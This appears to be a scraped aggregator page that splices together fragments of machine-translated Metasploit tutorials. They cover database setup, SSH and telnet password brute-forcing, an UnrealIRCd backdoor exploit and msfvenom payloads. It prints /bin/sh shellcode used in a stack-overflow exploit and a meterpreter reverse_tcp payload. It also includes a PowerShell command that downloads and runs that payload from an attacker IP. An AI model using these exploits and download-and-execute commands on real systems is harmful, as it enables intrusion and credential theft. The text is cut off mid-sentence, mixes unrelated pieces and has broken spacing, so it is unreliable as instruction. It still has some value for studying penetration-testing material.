1, first look at the PostgreSQL port, the default is automatically open, Port 7337.[Email protected]:~# netstat-tnpl |grep PostgresTCP 0 0 127.0.0.1:7337 0.0.0.0:* LISTEN 1100/postgresTCP6 0 0:: 1:7337:::* LISTEN 1100/postgres2. View the MSF configuration with database users and Passwords[Email protected]:~# cat/opt/metasploit/config/database.ymlDevelopment:www.2cto.comAdapter: "PostgreSQL"Database: "Msf3dev"Username: "MSF3"Password: "C80c3cea"port:73
}Second, we payload first to use the first validated run/bin/sh shellcode#Build the buffer for transmissionbuf=""; BUF = Make_nops ();buf+="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"buf+="\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"buf+="\x80\xe8\xdc\xff\xff\xff/bin/sh"; #buf+= "\XA4\XF4\XFF\XBF" #buf + = payload.encodedBUF + = [].fill (target.ret,0,100). Pack ('v*')In particular, note that the number of NOP instructions We added last time is 15
Password Code blasting moduleBlasting SSH service password guessing most of them are search SSH under Linux this time we can see a lot of search ssh_login find a dictionaryUse Auxiliary/scanner/ssh/ssh_loginShow Optionsset RHOST IP address set pass_file passset USERNAME rootexploitThe operation of the other services below it is the same, not one operation.Demolition hack telnet slow search telnet_loginuse auxiliary/scanner/telnet/telnet_loginshow opiotnsset RHOST ipset pass_file Passset USERNAME
=" Wkiol1hki0za_vcjaabbeoqv9pi188.jpg "/>1.11 Enter "CD Rootfs" in the terminal, enter the Rootfs directory, enter the command "LS" under Terminal to list the directory.1.12 Enter "MORE/ETC/PASSWD" in the terminal to view the password in the target host system.650) this.width=650; "src=" http://s1.51cto.com/wyfs02/M02/8B/58/wKiom1hKI03yl_DnAACw2l6usRw373.jpg "style=" float: none; "title=" 5.jpg "alt=" Wkiom1hki03yl_dnaacw2l6usrw373.jpg "/>650) this.width=650; "src=" http://s4.51cto.com/wyfs02/M0
Metasploit Overflow UNREALIRCD Backdoor VulnerabilityUse the UNREALIRCD backdoor vulnerability to obtain root permissions for the target host.The unrealircd of some sites, in which Debug3_dolog_system macros contain externally introduced malicious code, allows remote attackers to execute arbitrary code.First, using the Nmap tool to scan the target hostThe 1.1 uses the Nmap command to scan the target host. Click on the left side of the desktop and sel
There are many exploits in the Metasploit framework, including buffer overflows, browser exploits, Web application vulnerabilities, Backdoor exploits, Zombie takeover tools, and More. Exploit developers and people who have contributed to this framework have shared a lot of interesting and useful things.
First, use Msfvenom to generate PS1 files:Msfvenom-p windows/x64/meterpreter/reverse_tcp lhost=192.168. 217.162 lport=7788 -F psh-reflection >7788. PS1Second, open MSF monitoring: use exploit/multi/> Set payload windows/x64/meterpreter/= windows/meterpreter/ > Set lhost xxx.xxx.xxx. = = xxx.xxx.xxx. >=> RunSecond, execute the CMD command on the target machine:" IEX (New-object net.webclient). Downloadstring (' Http://192.168.217.162/7788.ps1 '); Xx.ps1"Note whether the target and system are 3
really all do not kill is not, part still can, mainly is introduce msfvenom.-----There are still a lot of instructional videos and materials that are used before the Kali version. With the update some commands are not adapted to the newest Kali. (also a person who has fallen out of the pit)After Msfvenom integrates Msfpayload and msfencode,2015, the latter two items are removed. It is not possible to follow some tutorials to lose two commands.
Msfvenom Important parameters: (You can use ms
How do I use the zoomeye API?
If you is a Python developer, please view zoomeye-sdk. If not, the zoomeye API documentation is good for you.
$ sudo easy_install zoomeye-sdk
Or
$ sudo pip install Git+https://github.com/zoomeye/sdk.git
How to search targets with Zoomeye in Metasploit?
MSF auxiliary (zoomeye_search) > Info name:zoomeye search Module:auxiliary/gather/zoomeye_search Lice Nse:metasploit Framework License (BSD) Rank:normal provided By:nix
We first go to this directory to see the contents of the Database.yml file:It's the information we see.Then open Metasploit, run the db_connect instruction link database. The format is:Db_connect User name: password @127.0.0.1: Port/Database nameIn my case, that is:Db_connect MSF: Password @127.0.0.1:5432/msfAfter that, the database is connected.Below is the Nmap scan and store the results:The-ox instruction is to store nmap results in a place of deve
1, service PostgreSQL start open the database service
2, service Metasploit start Metasploit Services
3. UPDATE-RC.D PostgreSQL Enable update Service
4. UPDATE-RC.D Metasploit Enable
5, UPDATE-RC.D ssh enable to update its own port services
6, Msfconsole
7, Db_status View the database
Link Database Db_connect msf3:vfe90zusg1wfufkybawxotfatbsmcjvc@127.0.0.1/msf3
V
As we all know, when conducting penetration testing under MSF, the results data can be saved to the database, allowing individual team members to synchronize data during penetration testing.For example, Metasploit provides the Db_nmap command, which allows the Nmap scan results to be stored directly in the database, and also provides a db_import command to support the import of scan results from up to 20 scans.Metasploit supports a variety of database
The attack is done under BT5 and the target program is running on an Ubuntu virtual machine.First, you need to figure out what a stack overflow attack is, read morehttp://blog.csdn.net/cnctloveyu/article/details/4236212This article is very clear, but the specific example is not very accurate, a little bit wrong.Here is an example of a modified executable that I have verified.Shell.c1#include 2 3 CharShellcode[] =4 "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" 5 "\x89\xf3\x8d
-new_fd 1\n"); - Close (NEW_FD); theExit0); the } theprintf"close-new_fd 2\n"); the Close (NEW_FD); - } theprintf"close-sockfd\n"); the Close (SOCKFD); the}This core is the recvastring function we are concerned with, which contains an obvious stack overflow vulnerability. We look specifically at:1 voidRecvastring (intnew_fd)2 {3UnsignedCharbuff[ -];4 intI=0;5printf"sp=0x%x,addr=0x%x bytes.\n", get_sp (),buff);6 intNumBytes = recv (New_fd,buff,1024x768,0);7 if(numbytes==-1
The methods involved in this article can only be tested on authorized machines.First, I suggest you check the usage of meterpreter on the Internet. Read this article to understand why msf is used for permission elevation (because msf has a meterpreter which is very powerful ^_^)Metasploit has two tools: msfpayload and msfencode. These tools not only generate exe-type backdoors, but also generate webshells of the web script type. By generating webshell
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.